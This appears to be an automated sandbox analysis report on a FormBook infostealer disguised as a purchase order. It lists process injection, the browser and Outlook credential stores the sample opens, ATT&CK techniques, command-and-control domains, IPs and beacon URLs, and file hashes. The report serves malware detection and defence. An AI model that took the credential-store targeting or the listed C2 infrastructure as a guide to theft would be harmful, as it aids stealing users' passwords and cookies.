                Source: jfBrBcvTIMPfDU.exe, 00000005.00000002.2661131947.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000000.1754096305.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2661177978.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: jfBrBcvTIMPfDU.exe, 00000005.00000002.2661131947.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000000.1754096305.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2661177978.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: jfBrBcvTIMPfDU.exe, 00000005.00000002.2661131947.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000000.1754096305.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2661177978.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Purchase Order..exeQueries volume information: C:\Users\user\Desktop\Purchase Order..exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567398 Sample: Purchase Order..exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 30 www.cyperla.xyz 2->30 32 cyperla.xyz 2->32 34 6 other IPs or domains 2->34 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 48 Yara detected AntiVM3 2->48 52 4 other signatures 2->52 10 Purchase Order..exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 file5 28 C:\Users\user\...\Purchase Order..exe.log, ASCII 10->28 dropped 13 Purchase Order..exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 jfBrBcvTIMPfDU.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 isoburn.exe 13 16->19         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 22 jfBrBcvTIMPfDU.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 36 cyperla.xyz 31.186.11.114, 49714, 80 BETAINTERNATIONALTR Turkey 22->36 38 www.madhf.tech 103.224.182.242, 49722, 49723, 49724 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->38 40 3 other IPs or domains 22->40 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Purchase Order..exe55%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                Purchase Order..exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.bser101pp.buzz/v89f/?MVWd=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2NYglVjUbXXrY07zMLLi7rmhcEJnvkrNOok7dcSq1J6Z3g==&kfm=dFj0Olb0%Avira URL Cloudsafe
                http://www.goldstarfootwear.shop/8m07/0%Avira URL Cloudsafe
                https://www.cstrategy.online/qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb0%Avira URL Cloudsafe
                http://www.cstrategy.online/qx5d/0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/0%Avira URL Cloudsafe
                http://www.goldstarfootwear.shop0%Avira URL Cloudsafe
                http://www.bser101pp.buzz/v89f/0%Avira URL Cloudsafe
                http://www.cyperla.xyz/qygv/?MVWd=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WmoCRaQ8OoRB1M8xsODg9Mufe/exe8zzsMcFcs0FiYc3z1g==&kfm=dFj0Olb0%Avira URL Cloudsafe
                http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                goldstarfootwear.shop
                		3.33.130.190
                		truefalse
                  		unknown
                  cstrategy.online
                  		194.76.119.60
                  		truefalse
                    		unknown
                    www.madhf.tech
                    		103.224.182.242
                    		truefalse
                      		high
                      cyperla.xyz
                      		31.186.11.114
                      		truetrue
                        		unknown
                        www.bser101pp.buzz
                        		188.114.96.6
                        		truefalse
                          		high
                          www.cstrategy.online
                          		unknown
                          		unknownfalse
                            		unknown
                            www.goldstarfootwear.shop
                            		unknown
                            		unknownfalse
                              		unknown
                              www.cyperla.xyz
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olbfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.bser101pp.buzz/v89f/?MVWd=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2NYglVjUbXXrY07zMLLi7rmhcEJnvkrNOok7dcSq1J6Z3g==&kfm=dFj0Olbfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.goldstarfootwear.shop/8m07/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.bser101pp.buzz/v89f/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.madhf.tech/6ou6/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cstrategy.online/qx5d/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cyperla.xyz/qygv/?MVWd=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WmoCRaQ8OoRB1M8xsODg9Mufe/exe8zzsMcFcs0FiYc3z1g==&kfm=dFj0Olbfalse
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabisoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoisoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.cstrategy.online/qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RCisoburn.exe, 00000006.00000002.2663245910.0000000005426000.00000004.10000000.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000003286000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://localhost/arkanoid_server/requests.phpisoburn.exe, 00000006.00000002.2663245910.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2130259016.000000003C42C000.00000004.80000000.00040000.00000000.sdmp, Purchase Order..exefalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.ecosia.org/newtab/isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.goldstarfootwear.shopjfBrBcvTIMPfDU.exe, 00000009.00000002.2661409354.00000000027A5000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajPjfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000003418000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    188.114.96.6
                                                    		www.bser101pp.buzzEuropean Union
                                                    		13335CLOUDFLARENETUSfalse
                                                    31.186.11.114
                                                    		cyperla.xyzTurkey
                                                    		199484BETAINTERNATIONALTRtrue
                                                    103.224.182.242
                                                    		www.madhf.techAustralia
                                                    		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                    194.76.119.60
                                                    		cstrategy.onlineItaly
                                                    		202675KELIWEBITfalse
                                                    3.33.130.190
                                                    		goldstarfootwear.shopUnited States
                                                    		8987AMAZONEXPANSIONGBfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1567398
                                                    Start date and time:2024-12-03 14:24:37 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 37s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:11
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Purchase Order..exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@7/5
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 96%
                                                    • Number of executed functions: 102
                                                    • Number of non-executed functions: 302
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target jfBrBcvTIMPfDU.exe, PID 5568 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • VT rate limit hit for: Purchase Order..exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    08:25:33API Interceptor1x Sleep call for process: Purchase Order..exe modified
                                                    08:26:52API Interceptor1008648x Sleep call for process: isoburn.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    188.114.96.6ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                    • orbitdownloader.com/
                                                    ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                    • orbitdownloader.com/
                                                    e6o7hKFmfC.exeGet hashmaliciousFormBookBrowse
                                                    • www.astrofrance.online/uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM
                                                    31.186.11.114Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                          103.224.182.242attached invoice.exeGet hashmaliciousFormBookBrowse
                                                          • www.seeseye.website/ebz6/
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • www.madhf.tech/0mwe/
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • www.madhf.tech/3iym/
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.madhf.tech/6ou6/
                                                          Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.madhf.tech/6ou6/
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • www.madhf.tech/3iym/
                                                          Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                          • www.madhf.tech/6ou6/
                                                          Payroll List.exeGet hashmaliciousFormBookBrowse
                                                          • www.klohk.tech/3m3e/
                                                          Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                          • www.madhf.tech/0mwe/
                                                          DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                          • www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.madhf.techYH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 15.204.67.7
                                                          Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          www.bser101pp.buzzQuotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 172.67.158.106
                                                          Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 172.67.158.106
                                                          Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.58.90
                                                          Quotation.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.58.90
                                                          payments.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.58.90

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSSW_5724.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.156.195
                                                          0200011080.xlsGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.6
                                                          Oder Request &Company profile.xlsGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.6
                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.67.152
                                                          72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.218.146
                                                          quotation.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.90.137
                                                          0200011080.xlsGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.6
                                                          Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.6
                                                          Pagamento deposito e fattura proforma firmata.xlsGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.6
                                                          Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.6
                                                          TRELLIAN-AS-APTrellianPtyLimitedAUattached invoice.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          https://bielefelde.de/Get hashmaliciousUnknownBrowse
                                                          • 103.224.182.206
                                                          Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          kkEzK284oT.exeGet hashmaliciousHTMLPhisherBrowse
                                                          • 103.224.182.206
                                                          http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                          • 103.224.212.217
                                                          http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                          • 103.224.212.217
                                                          BETAINTERNATIONALTRQuotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 31.186.11.114
                                                          Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 31.186.11.114
                                                          Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                          • 31.186.11.114
                                                          z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                          • 31.186.11.254
                                                          0nazQxrt5MZ5BRK.exeGet hashmaliciousFormBookBrowse
                                                          • 31.186.11.254
                                                          z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 31.186.11.254
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • 31.186.11.254
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 31.186.11.254
                                                          #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                          • 31.186.11.254
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • 31.186.11.254

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order..exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Purchase Order..exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
